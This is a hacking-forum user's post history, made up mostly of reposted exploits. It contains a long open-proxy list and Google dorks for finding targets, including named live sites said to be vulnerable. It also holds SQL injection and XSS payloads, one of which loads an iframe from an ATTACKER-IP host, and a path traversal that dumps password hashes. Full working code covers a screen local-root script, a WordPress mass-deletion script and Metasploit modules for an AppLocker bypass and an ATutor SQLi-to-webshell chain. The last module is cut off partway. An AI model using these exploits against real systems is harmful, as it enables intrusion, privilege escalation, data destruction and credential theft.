
geeko

Active Members
  • Content Count

    61
  • Joined

  • Last visited

Community Reputation

26 Excellent

About geeko

  • Rank
    Registered user
  • Birthday 03/05/1977

Converted

  • Location
    Paris
  • Interests
    C programming


  1. 46.99.133.241:1080 66.58.244.108:24705 71.228.211.89:17002 45.63.90.226:6789 162.254.168.154:56499 68.7.156.247:13623 104.238.183.182:6789 67.197.149.140:18293 104.219.112.114:52862 208.104.74.191:27899 47.35.38.116:57216 108.218.207.108:30049 183.232.25.100:4080 107.151.129.249:1080 68.178.128.170:18749 45.63.82.190:6789 24.2.70.116:24182 180.92.239.217:1080 97.82.41.68:40641 45.63.88.229:6789 72.243.180.159:45554 24.196.134.76:18527 186.121.206.234:1080 67.197.28.10:43491 45.63.83.124:6789 64.126.70.72:53473 8.30.102.50:45554 76.8.208.230:45554 204.248.125.246:45554 104.207.150.81:6789 184.20.102.255:1080 66.167.193.138:22010 45.32.130.95:6789 47.208.147.42:27181 63.240.250.44:50652 67.170.49.111:29381 223.25.99.163:1180 47.222.33.206:55495 76.29.93.253:50999 73.25.253.84:25242 104.238.182.74:6789 64.121.199.87:20985 24.189.131.7:19821 208.74.33.114:10223 45.63.88.181:6789 173.208.137.46:6789 24.178.207.30:10379 75.118.153.228:10200 208.104.74.89:27677 45.32.130.120:6789 27.123.1.162:1080 216.10.224.223:45554 24.74.75.139:34070 96.237.161.130:46555 117.74.120.81:1080 74.75.164.255:10200 97.99.103.153:53293 75.151.213.85:3366 162.213.178.102:45554 68.64.229.84:45554 36.66.213.167:1080 45.63.88.187:6789 208.104.74.229:27809 47.35.79.9:46845 24.240.255.93:12666 45.32.139.243:6789 100.42.158.187:45554 75.76.230.236:45554 104.238.180.134:6789 208.104.232.210:52886 72.91.84.235:51815 209.159.251.12:56511 67.197.232.209:23864 104.238.183.133:6789 97.77.75.181:28111 73.181.120.114:59152 216.24.77.41:17382 45.32.213.237:6789 45.63.90.33:6789 45.63.89.78:6789 216.212.236.240:45554 54.215.184.209:34646 76.29.6.56:40178 73.199.232.15:30495 45.32.141.69:6789 91.195.103.172:31336 73.15.240.216:28416 76.94.99.191:63798 76.25.126.209:58399 45.63.84.133:6789 24.16.89.71:38784 45.32.130.189:6789 45.32.137.112:6789 68.117.143.146:17472 68.81.198.11:21645 45.32.128.60:6789 190.129.1.141:46690 175.143.94.161:10233 123.207.167.125:1080 67.197.251.54:20191 104.244.223.85:24950 
24.72.213.167:45554 174.141.178.158:45554 63.142.208.138:14803 45.32.141.196:6789 24.93.138.78:10200 104.241.13.16:10200 208.104.74.50:27766 67.197.236.88:22961 45.55.28.39:21532 104.220.172.192:14811 70.99.133.238:15466 72.47.70.110:55446 104.244.140.93:45554 73.13.150.205:12327 208.111.120.173:10200 67.197.29.170:43075 68.225.192.228:21202 73.59.46.201:45554 103.195.142.88:9999 173.26.244.42:36839 67.197.253.126:18583 67.197.232.59:24018 64.4.99.16:62915 67.197.29.186:43091 180.178.104.178:1080 45.55.28.39:24609 66.110.216.105:39431 64.184.5.7:45554 68.198.171.167:29702 104.219.112.98:16329 24.249.92.200:45554 45.63.94.22:6789 45.63.85.71:6789 45.32.136.150:6789 70.234.238.97:8088 45.63.93.251:6789 96.27.214.206:45554 64.185.49.177:45554 115.133.125.17:55363 45.63.91.180:6789 47.88.77.171:1080 67.197.252.158:18807 67.50.240.12:26089 104.238.180.191:6789
  2. Dork: intext:"Powered by ENS Consultants" |=============================================================| | | | Exploit Title :ENS Consultants Bypass Login Vulnerability | | | Google Dork intext:"Powered by ENS Consultants" | Tested on : Paroot | |======================================| | | Tutorial : | | Search The Dork Or Go To Vendor HomePage And Select Your Target | Then Go To Admin Panel At : /admin/login.php | And Open Noredirect Add-Ons And Click On "Add" | Paste The Target With ^ Character : ^Target | At Last Change Url To : site/admin/index.php | Upload Your Shell And Enjoy ! | |=============================================================|
  3. # # # # # # Exploit Title: Joomla! Component Abstract v2.1 - SQL Injection # Google Dork: inurl:index.php?option=com_abstract # Date: 02.03.2017 # Vendor Homepage: http://joomla6teen.com/ # Software: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/abstract-manager/ # Demo: http://demo.joomla6teen.com/abstractmanager # Version: 2.1 # Tested on: Win7 x64, Kali Linux x64 # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/index.php?option=com_abstract&view=conferences&layout=detail&pid= # http://localhost/[PATH]/index.php?option=com_abstract&view=conferences&task=contactEmail&pid=[SQL] # 1+OR+1+GROUP+BY+CONCAT_WS(0x3a,0x496873616e53656e63616e,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1 # # # # #
  4. The passfile you are actually looking for is a wordlist... or password list... you can make it yourself without stress, depending on the countries you want to scan, or if you want to go random you can use something generic that you can find with a single search on Google.
  5. [+] Credits: John Page AKA hyp3rlinx
     [+] Website: hyp3rlinx.altervista.org
     [+] Source: http://hyp3rlinx.altervista.org/advisories/PHPSHELL-v2.4-CROSS-SITE-SCRIPTING.txt
     [+] ISR: ApparitionSec

     Vendor: sourceforge.net/projects/phpshell/ , phpshell.sourceforge.net/

     Product: PHPShell v2.4

     Vulnerability Type: Cross Site Scripting

     CVE Reference: N/A

     Security Issue:
     Multiple cross site scripting entry points exist in PHPShell, undermining the integrity between the user's browser and the server and allowing remote attackers to bypass access controls such as the same-origin policy if an authenticated user clicks an attacker supplied link. The XSS issue is made possible because PHPShell calls print $_SERVER['PHP_SELF'] on the main HTML form. Since PHP_SELF references the URL, PHPShell simply reads our XSS payload in the URL and echoes it back to the client.

     <form name="shell" enctype="multipart/form-data" action="<?php print($_SERVER['PHP_SELF']) ?>" method="post">

     Since PHPShell's purpose is to execute system commands, this XSS vulnerability can potentially become a 'Remote Command Execution' vulnerability. Moreover, this XSS issue can also potentially leverage a Session Fixation vulnerability also present in PHPShell. Reference: http://hyp3rlinx.altervista.org/advisories/PHPSHELL-v2.4-SESSION-FIXATION.txt

     Tested successfully in Firefox.

     Exploit/POC:

     XSS 1) http://VICTIM-IP/phpshell-2.4/phpshell.php/%22/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

     OR inject an IFRAME to phish and steal credentials, you get the idea.
     http://VICTIM-IP/phpshell-2.4/phpshell.php/%22/%3E%3Cscript%3Evar%20frm=document.createElement('IFRAME');document.body.appendChild(frm);frm.setAttribute(%22width%22,%22900%22);frm.setAttribute(%22height%22,%22900%22);frm.src=%22http://ATTACKER-IP.com%22%3C/script%3E%3C!--

     XSS 2) http://VICTIM-IP/phpshell-2.4/phpshell.php
     On the Login Authentication HTML form 'username' input field: " onMousemove="alert(document.cookie) , then enter a password and hit Enter.

     Network Access: Remote

     Severity: Medium

     Disclosure Timeline:
     Vendor Notification: No reply. In addition, the INSTALL file "Bugs? Comments?" Tracker System link is HTTP 404: http://sourceforge.net/tracker/?group_id=156638
     February 18, 2017 : Public Disclosure
  6. Cisco ASA: Buffer overflows in WebVPN cifs handling CVE-2017-3807

     The WebVPN http server exposes a way of accessing files from CIFS with a url hook of the form: https://portal/+webvpn+/CIFS_R/share_server/share_name/file. When someone logged into the portal navigates to such an address, the http_cifs_process_path function parses the request URI and creates 2 C strings in a http_cifs_context struct:

     http_cifs_context:
       +0x160 char* file_dir
       +0x168 char* file_name

     These strings are copied in various places, but this is done incorrectly. For example, in ewaURLHookCifs, there is the following pseudocode:

     ```c
     filename_copy_buf = calloc(1LL, 336LL);
     net_handle[10] = filename_copy_buf;
     if ( filename_copy_buf ) {
       src_len = _wrap_strlen(filename_from_request);
       if ( filename_from_request[src_len - 1] == ('|') ) {
         // wrong length (src length)
         strncpy((char *)filename_copy_buf, filename_from_request, src_len - 1);
       }
     ```

     In this case, a fixed size buf (|filename_copy_buf|) is allocated. Later, strncpy is called to copy to it, but the length passed is the length of the src string, which can be larger than 366 bytes. This leads to heap overflow.

     There appear to be various other places where the copying is done in an unsafe way:
     - http_cifs_context_to_name, which is called from ewaFile{Read,Write,Get}Cifs, and ewaFilePost, uses strcat to copy the file path and file name to a fixed size (stack) buffer.
     - http_cifs_pre_fopen, which has a similar issue with passing the length of the src buffer to strncpy.
     - Possibly http_add_query_str_from_context.

     There are probably others that I missed. Note that triggering this bug requires logging in to the WebVPN portal first, but the cifs share does not need to exist.

     Repro: Login to WebVPN portal, navigate to: https://portal/+webvpn+/CIFS_R/server/name/ followed by 500 'A's. ("server" and "name" may be passed verbatim)

     ```
     *** Error in `lina': malloc(): memory corruption: 0x00007fa40c53f570 ***
     ======= Backtrace: =========
     /lib64/libc.so.6(+0x3f0486e74f)[0x7fa4139fc74f]
     /lib64/libc.so.6(+0x3f048783ee)[0x7fa413a063ee]
     /lib64/libc.so.6(+0x3f0487be99)[0x7fa413a09e99]
     /lib64/libc.so.6(__libc_malloc+0x60)[0x7fa413a0b5a0]
     lina(+0x321976a)[0x7fa41a2b276a]
     lina(mem_mh_calloc+0x123)[0x7fa41a2b4c83]
     lina(resMgrCalloc+0x100)[0x7fa419659410]
     lina(calloc+0x94)[0x7fa419589a34]
     lina(ewsFileSetupFilesystemDoc+0x28)[0x7fa41826a608]
     lina(ewsServeFindDocument+0x142)[0x7fa418278192]
     lina(ewsServeStart+0x114)[0x7fa4182784a4]
     lina(ewsParse+0x19a0)[0x7fa418272cc0]
     lina(ewsRun+0x9c)[0x7fa41826955c]
     lina(emweb_th+0x6ab)[0x7fa418286aeb]
     lina(+0xde58ab)[0x7fa417e7e8ab]
     ```

     This was tested on 9.6(2).

     This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.
  7. [+] Website: hyp3rlinx.altervista.org
     [+] Source: http://hyp3rlinx.altervista.org/advisories/SAWMILL-PASS-THE-HASH-AUTHENTICATION-BYPASS.txt
     [+] ISR: ApparitionSec

     Vendor: www.sawmill.net

     Product: Sawmill Enterprise v8.7.9 (sawmill8.7.9.4_x86_windows.exe hash: b7ec7bc98c42c4908dfc50450b4521d0)
     Sawmill is a powerful hierarchical log analysis tool that runs on every major platform.

     Vulnerability Type: Pass the Hash Authentication Bypass

     CVE Reference: CVE-2017-5496

     Security Issue:
     Sawmill suffers from a classic "Pass The Hash" vulnerability whereby an attacker who gains access to the hashed user account passwords can login to the Sawmill interface using the raw MD5 hash values, allowing attackers to bypass the work of offline cracking account password hashes. This issue is usually known to affect Windows systems, e.g. (NT Pass the Hash/Securityfocus, 1997). However, this vulnerability can also present itself in a vulnerable web application.

     Sawmill account password hashes are stored under the LogAnalysisInfo/ directory in "users.cfg", e.g.

       users = {
         root_admin = {
           username = "admin"
           password_checksum = "e99a18c428cb38d5f260853678922e03"
           email_address = ""

     This config file is stored local to the Sawmill application. However, if an attacker gains access to a backup of the config that is stored in some other location that is then compromised, it can lead to subversion of Sawmill's authentication process. Moreover, since the 'users.cfg' file is world readable, a regular non-Admin Windows user who logs into the system running Sawmill can now grab a password hash and easily login to the vulnerable application without needing the password itself.

     How to test? Sawmill running (default port 8988), log off Windows and switch to a "Standard" Windows non-Administrator user.
     1) Open "users.cfg" under Sawmill's directory "C:\Program Files\Sawmill 8\LogAnalysisInfo" and copy the root_admin Admin password hash.
     2) Go to the Sawmill login page in a web browser http://VICTIM-IP:8988/ , enter username 'admin' and the hash. Tada! You're Admin.

     Finally, Sawmill passwords are hashed using the vulnerable MD5 algorithm and no salt, e.g. password: abc123 MD5 hash: e99a18c428cb38d5f260853678922e03

     Disclosure Timeline:
     Vendor Notification: January 7, 2017
     CVE-2017-5496 assigned : January 20
     Request status : January 26
     Vendor: Fix avail later in year, still no ETA
     Inform vendor public disclose date
     February 18, 2017 : Public Disclosure

     Network Access: Remote

     Impact: Information Disclosure, Privilege Escalation

     Severity Level: High

     [+] Disclaimer
     The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere.
  8. ############################################################# # Application Name : SQLi in Dejabú's Scripts # Vulnerable Type : SQL İnjection # Google Dork: intext:Diseño de páginas web Dejabú inurl:php?id= # Author: fl3xpl0it a.k.a KurokoTetsuya # Date: 20.02.2017 # Tested On Demo Sites: [+] http://www.cepaproduccion.com/content/news.php?id=1114' [+] http://www.cedeal.org/content/publicaciones.php?id=34'&pagina=2 # Warning: If you not found SQLi , you try SQLi other parameter. # Example: http://www.target.com/vuln.php?cat=54&id=61' (No SQLi) # Example: http://www.target.com/vuln.php?cat=54'&id=61 (SQLi Detected) #############################################################
  9. # Exploit Title: Polycom VVX Web Interface - Change Admin Password as User # Date: January 26, 2017 # Exploit Author: Mike Brown # Vendor Homepage: http://www.polycom.com/ # Software Link: http://downloads.polycom.com/voice/voip/uc_sw_releases_matrix.html # Version: Polycom vvx 410 UC Software Version: 5.3.1.0436 # CVE : N/A # This module requires the user to have access to the "User" account (Default User:123) in the Polycom VoIP phone's web interface. # The user can use the following steps to escalate privileges and become the Admin user to reveal menu items internal IP addresses # and account information. 1. Login with the "User" Account. 2. Navigate to Settings > Change Password. 3. Fill in "Old Password" with the current "User" password. 4. Fill in "New Password" with the new "Admin" account password, and confirm. 5. Using a live HTML editor, inspect the old password field. you will see: <input id="olduserpswd" name="122" isrebootrequired="false" helpid="525" value="" paramname="device.auth.localUserPassword" default="" config="????" variabletype="string" min="0" max="32" maxlength="32" hintdivid="userAccountConf.htm_1" type="password"> 6. Change the name field to "120" 7. Click "Save" 8. An error will be shown on screen but you can now log into the Admin account with the new password.
  10. #!/bin/bash # screenroot.sh # setuid screen v4.5.0 local root exploit # abuses ld.so.preload overwriting to get root. # bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html # HACK THE PLANET # ~ infodox (25/1/2017) echo "~ gnu/screenroot ~" echo "[+] First, we create our shell and library..." cat << EOF > /tmp/libhax.c #include <stdio.h> #include <sys/types.h> #include <unistd.h> __attribute__ ((__constructor__)) void dropshell(void){ chown("/tmp/rootshell", 0, 0); chmod("/tmp/rootshell", 04755); unlink("/etc/ld.so.preload"); printf("[+] done!\n"); } EOF gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c rm -f /tmp/libhax.c cat << EOF > /tmp/rootshell.c #include <stdio.h> int main(void){ setuid(0); setgid(0); seteuid(0); setegid(0); execvp("/bin/sh", NULL, NULL); } EOF gcc -o /tmp/rootshell /tmp/rootshell.c rm -f /tmp/rootshell.c echo "[+] Now we create our /etc/ld.so.preload file..." cd /etc umask 000 # because screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed echo "[+] Triggering..." screen -ls # screen itself is setuid, so... /tmp/rootshell
  11. # Exploit Title: TM RG4332 Wireless Router Traversal Arbitrary File Read # Date: 27/01/2017 # Exploit Author: Saeid Atabaki # Version: RG4332_V2.7.0 # Tested on: RG4332 with mini_http 1.19 = 1 ============================================================= GET /cgi-bin/webproc?getpage=html/../../../etc/passwd&var:menu=status&var:page=system_msg HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: sessionid=17746062; auth=ok; expires=Sun, 15-May-2012 01:45:46 GMT; language=en_us; Lan_IPAddress=192.168.0.1; sys_UserName=admin; expires=Mon, 31-Jan-2050 16:00:00 GMT Connection: close --- HTTP/1.0 200 OK Content-type: text/html Cache-Control: no-cache set-cookie: sessionid=17746062; set-cookie: auth=ok; set-cookie: expires=Sun, 15-May-2012 01:45:46 GMT; #root:x:0:0:root:/root:/bin/bash root:x:0:0:root:/root:/bin/sh #tw:x:504:504::/home/tw:/bin/bash #tw:x:504:504::/home/tw:/bin/msh = 2 ============================================================= GET /cgi-bin/webproc?getpage=html/../../../etc/shadow&var:menu=status&var:page=system_msg HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: sessionid=17746062; auth=ok; expires=Sun, 15-May-2012 01:45:46 GMT; language=en_us; Lan_IPAddress=192.168.0.1; sys_UserName=admin; expires=Mon, 31-Jan-2050 16:00:00 GMT Connection: close --- HTTP/1.0 200 OK Content-type: text/html Cache-Control: no-cache set-cookie: sessionid=17746062; set-cookie: auth=ok; set-cookie: expires=Sun, 15-May-2012 01:45:46 GMT; #root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7::: root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7::: #tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7::: 
#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::
  12. * Exploit Title: Bulk Delete [Privilege Escalation]
      * Discovery Date: 2016-02-10
      * Exploit Author: Panagiotis Vagenas
      * Author Link: https://twitter.com/panVagenas
      * Vendor Homepage: http://bulkwp.com/
      * Software Link: https://wordpress.org/plugins/bulk-delete/
      * Version: 5.5.3
      * Tested on: WordPress 4.4.2
      * Category: WebApps, WordPress

      Description
      -----------
      _Bulk Delete_ plugin for WordPress suffers from a privilege escalation vulnerability. Any registered user can exploit the lack of capabilities checks to perform all administrative tasks provided by the _Bulk Delete_ plugin. Some of these actions, but not all, are:
      - `bd_delete_pages_by_status`: deletes all pages by status
      - `bd_delete_posts_by_post_type`: deletes all posts by type
      - `bd_delete_users_by_meta`: deletes all users with a specific pair of meta name, meta value

      Nearly all actions registered by this plugin can be performed by any user, as long as they are passed to a query var named `bd_action` and the user has a valid account. These actions would normally require administrative rights, so we can consider this a privilege escalation vulnerability.

      PoC
      ---
      The following script will delete all pages, posts and users from the infected website.
``` #!/usr/bin/python3 ######################################################################## ######## # Bulk Delete Privilege Escalation Exploit # # **IMPORTANT** Don't use this in a production site, if vulnerable it wi ll # delete nearly all your sites content # # Author: Panagiotis Vagenas <pan.vagenas@gmail.com> ######################################################################## ######## import requests loginUrl = 'http://example.com/wp-login.php' adminUrl = 'http://example.com/wp-admin/index.php' loginPostData = { 'log': 'username', 'pwd': 'password', 'rememberme': 'forever', 'wp-submit': 'Log+In' } l = requests.post(loginUrl, data=loginPostData) if l.status_code != 200 or len(l.history) == 0 or len(l.history[0].cookies) == 0: print("Couldn't acquire a valid session") exit(1) loggedInCookies = l.history[0].cookies def do_action(action, data): try: requests.post( adminUrl + '?bd_action=' + action, data=data, cookies=loggedInCookies, timeout=30 ) except TimeoutError: print('Action ' + action + ' timed out') else: print('Action ' + action + ' performed') print('Deleting all pages') do_action( 'delete_pages_by_status', { 'smbd_pages_force_delete': 'true', 'smbd_published_pages': 'published_pages', 'smbd_draft_pages': 'draft_pages', 'smbd_pending_pages': 'pending_pages', 'smbd_future_pages': 'future_pages', 'smbd_private_pages': 'private_pages', } ) print('Deleting all posts from all default post types') do_action('delete_posts_by_post_type', {'smbd_types[]': [ 'post', 'page', 'attachment', 'revision', 'nav_menu_item' ]}) print('Deleting all users') do_action( 'delete_users_by_meta', { 'smbd_u_meta_key': 'nickname', 'smbd_u_meta_compare': 'LIKE', 'smbd_u_meta_value': '', } ) exit(0) ``` Solution -------- Upgrade to v5.5.4 Timeline -------- 1. **2016-02-10**: Requested CVE ID 2. **2016-02-10**: Vendor notified through wordpress.org support forums 3. **2016-02-10**: Vendor notified through the contact form at bulkwp.com 4. 
**2016-02-10**: Vendor responded and received details about the issue 5. **2016-02-10**: Vendor verified vulnerability 6. **2016-02-13**: Vendor released v5.5.4 which resolves this issue exploit source : packetstormsecurity.com
  13. Hey, also put the source on your copy-pastes, that's the nice and decent thing to do.

    1. geeko

       done, satisfied?

  14. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class Metasploit4 < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::FileDropper include Msf::Post::File def initialize(info={}) super(update_info(info, 'Name' => 'AppLocker Execution Prevention Bypass', 'Description' => %q{ This module will generate a .NET service executable on the target and utilise InstallUtil to run the payload bypassing the AppLocker protection. Currently only the InstallUtil method is provided, but future methods can be added easily. }, 'License' => MSF_LICENSE, 'Author' => [ 'Casey Smith', # Original AppLocker bypass research 'OJ Reeves' # MSF module ], 'Platform' => [ 'win' ], 'Arch' => [ ARCH_X86, ARCH_X86_64 ], 'SessionTypes' => [ 'meterpreter' ], 'Targets' => [ [ 'Windows', {} ] ], 'DefaultTarget' => 0, 'DisclosureDate'=> 'Aug 3 2015', 'References' => [ ['URL', 'https://gist.github.com/subTee/fac6af078937dda81e57'] ] )) register_options([ OptEnum.new('TECHNIQUE', [true, 'Technique to use to bypass AppLocker', 'INSTALLUTIL', %w(INSTALLUTIL)])]) end # Run Method for when run command is issued def exploit if datastore['TECHNIQUE'] == 'INSTALLUTIL' if payload.arch.first == 'x64' && sysinfo['Architecture'] !~ /64/ fail_with(Failure::NoTarget, 'The target platform is x86. 64-bit payloads are not supported.') end end # sysinfo is only on meterpreter sessions print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil? 
if datastore['TECHNIQUE'] == 'INSTALLUTIL' execute_installutil end end def execute_installutil envs = get_envs('TEMP', 'windir') dotnet_path = get_dotnet_path(envs['windir']) print_status("Using .NET path #{dotnet_path}") cs_path = "#{envs['TEMP']}#{Rex::Text.rand_text_alpha(8)}.cs" exe_path = "#{envs['TEMP']}#{Rex::Text.rand_text_alpha(8)}.exe" installutil_path = "#{dotnet_path}InstallUtil.exe" print_status("Writing payload to #{cs_path}") write_file(cs_path, generate_csharp_source) register_files_for_cleanup(cs_path) print_status("Compiling payload to #{exe_path}") csc_path = "#{dotnet_path}csc.exe" csc_platform = payload.arch.first == 'x86' ? 'x86' : 'x64' vprint_status("Executing: #{csc_path} /target:winexe /nologo /platform:#{csc_platform} /w:0 /out:#{exe_path} #{cs_path}") cmd_exec(csc_path, "/target:winexe /nologo /platform:#{csc_platform} /w:0 /out:#{exe_path} #{cs_path}") print_status("Executing payload ...") vprint_status("Executing: #{installutil_path} /logfile= /LogToConsole=false /U #{exe_path}") client.sys.process.execute(installutil_path, "/logfile= /LogToConsole=false /U #{exe_path}", {'Hidden' => true}) register_files_for_cleanup(exe_path) end def get_dotnet_path(windir) base_path = "#{windir}Microsoft.NETFramework#{payload.arch.first == 'x86' ? 
'' : '64'}" paths = dir(base_path).select {|p| p[0] == 'v'} dotnet_path = nil paths.reverse.each do |p| path = "#{base_path}#{p}" if directory?(path) && file?("#{path}InstallUtil.exe") dotnet_path = path break end end unless dotnet_path fail_with(Failure::NotVulnerable, '.NET is not present on the target.') end dotnet_path end def generate_csharp_source sc = payload.encoded.each_byte.map {|b| "0x#{b.to_s(16)}"}.join(',') cs = %Q^ using System; namespace Pop { public class Program { public static void Main() { } } [System.ComponentModel.RunInstaller(true)] public class Pop : System.Configuration.Install.Installer { private static Int32 MEM_COMMIT=0x1000; private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40; private static UInt32 INFINITE = 0xFFFFFFFF; [System.Runtime.InteropServices.DllImport("kernel32")] private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p); [System.Runtime.InteropServices.DllImport("kernel32")] private static extern IntPtr CreateThread(IntPtr att, UIntPtr st, IntPtr sa, IntPtr p, Int32 c, ref IntPtr id); [System.Runtime.InteropServices.DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms); public override void Uninstall(System.Collections.IDictionary s) { byte[] sc = new byte[] {#{sc}}; IntPtr m = VirtualAlloc(IntPtr.Zero, (UIntPtr)sc.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); System.Runtime.InteropServices.Marshal.Copy(sc, 0, m, sc.Length); IntPtr id = IntPtr.Zero; WaitForSingleObject(CreateThread(id, UIntPtr.Zero, m, id, 0, ref id), INFINITE); } } } ^ cs end end exploit source : packetstormsecurity.com
  15. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info={}) super(update_info(info, 'Name' => 'ATutor 2.2.1 SQL Injection / Remote Code Execution', 'Description' => %q{ This module exploits a SQL Injection vulnerability and an authentication weakness vulnerability in ATutor. This essentially means an attacker can bypass authenication and reach the administrators interface where they can upload malcious code. You are required to login to the target to reach the SQL Injection, however this can be done as a student account and remote registration is enabled by default. }, 'License' => MSF_LICENSE, 'Author' => [ 'mr_me <steventhomasseeley[at]gmail.com>', # initial discovery, msf code ], 'References' => [ [ 'CVE', '2016-2555' ], [ 'URL', 'http://www.atutor.ca/' ] # Official Website ], 'Privileged' => false, 'Payload' => { 'DisableNops' => true, }, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Targets' => [[ 'Automatic', { }]], 'DisclosureDate' => 'Mar 1 2016', 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The path of Atutor', '/ATutor/']), OptString.new('USERNAME', [true, 'The username to authenticate as']), OptString.new('PASSWORD', [true, 'The password to authenticate with']) ],self.class) end def print_status(msg='') super("#{peer} - #{msg}") end def print_error(msg='') super("#{peer} - #{msg}") end def print_good(msg='') super("#{peer} - #{msg}") end def check # the only way to test if the target is vuln begin test_cookie = login(datastore['USERNAME'], datastore['PASSWORD'], false) rescue Msf::Exploit::Failed => e vprint_error(e.message) return Exploit::CheckCode::Unknown end if test_injection(test_cookie) return Exploit::CheckCode::Vulnerable else return 
Exploit::CheckCode::Safe end end def create_zip_file zip_file = Rex::Zip::Archive.new @header = Rex::Text.rand_text_alpha_upper(4) @payload_name = Rex::Text.rand_text_alpha_lower(4) @plugin_name = Rex::Text.rand_text_alpha_lower(3) path = "#{@plugin_name}/#{@payload_name}.php" register_file_for_cleanup("#{@payload_name}.php", "../../content/module/#{path}") zip_file.add_file(path, "<?php eval(base64_decode($_SERVER['HTTP_#{@header}'])); ?>") zip_file.pack end def exec_code send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "mods", @plugin_name, "#{@payload_name}.php"), 'raw_headers' => "#{@header}: #{Rex::Text.encode_base64(payload.encoded)}\r\n" }) end def upload_shell(cookie) post_data = Rex::MIME::Message.new post_data.add_part(create_zip_file, 'archive/zip', nil, "form-data; name="modulefile"; filename="#{@plugin_name}.zip"") post_data.add_part("#{Rex::Text.rand_text_alpha_upper(4)}", nil, nil, "form-data; name="install_upload"") data = post_data.to_s res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "mods", "_core", "modules", "install_modules.php"), 'method' => 'POST', 'data' => data, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'cookie' => cookie, 'agent' => 'Mozilla' }) if res && res.code == 302 && res.redirection.to_s.include?("module_install_step_1.php?mod=#{@plugin_name}") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "mods", "_core", "modules", res.redirection), 'cookie' => cookie, 'agent' => 'Mozilla', }) if res && res.code == 302 && res.redirection.to_s.include?("module_install_step_2.php?mod=#{@plugin_name}") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "mods", "_core", "modules", "module_install_step_2.php?mod=#{@plugin_name}"), 'cookie' => cookie, 'agent' => 'Mozilla', }) return true end end # auth failed if we land here, bail fail_with(Failure::Unknown, "Unable to upload php code") return false end def 
get_hashed_password(token, password, bypass) if bypass return Rex::Text.sha1(password + token) else return Rex::Text.sha1(Rex::Text.sha1(password) + token) end end def login(username, password, bypass) res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "login.php"), 'agent' => 'Mozilla', }) token = $1 if res.body =~ /) + "(.*)");/ cookie = "ATutorID=#{$1};" if res.get_cookies =~ /; ATutorID=(.*); ATutorID=/ if bypass password = get_hashed_password(token, password, true) else password = get_hashed_password(token, password, false) end res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "login.php"), 'vars_post' => { 'form_password_hidden' => password, 'form_login' => username, 'submit' => 'Login' }, 'cookie' => cookie, 'agent' => 'Mozilla' }) cookie = "ATutorID=#{$2};" if res.get_cookies =~ /(.*); ATutorID=(.*);/ # this is what happens when no state is maintained by the http client if res && res.code == 302 if res.redirection.to_s.include?('bounce.php?course=0') res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, res.redirection), 'cookie' => cookie, 'agent' => 'Mozilla' }) cookie = "ATutorID=#{$1};" if res.get_cookies =~ /ATutorID=(.*);/ if res && res.code == 302 && res.redirection.to_s.include?('users/index.php') res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, res.redirection), 'cookie' => cookie, 'agent' => 'Mozilla' }) cookie = "ATutorID=#{$1};" if res.get_cookies =~ /ATutorID=(.*);/ return cookie end else res.redirection.to_s.include?('admin/index.php') # if we made it here, we are admin return cookie end end # auth failed if we land here, bail fail_with(Failure::NoAccess, "Authentication failed with username #{username}") return nil end def perform_request(sqli, cookie) # the search requires a minimum of 3 chars sqli = "#{Rex::Text.rand_text_alpha(3)}'/**/or/**/#{sqli}/**/or/**/1='" rand_key = Rex::Text.rand_text_alpha(1) res = 
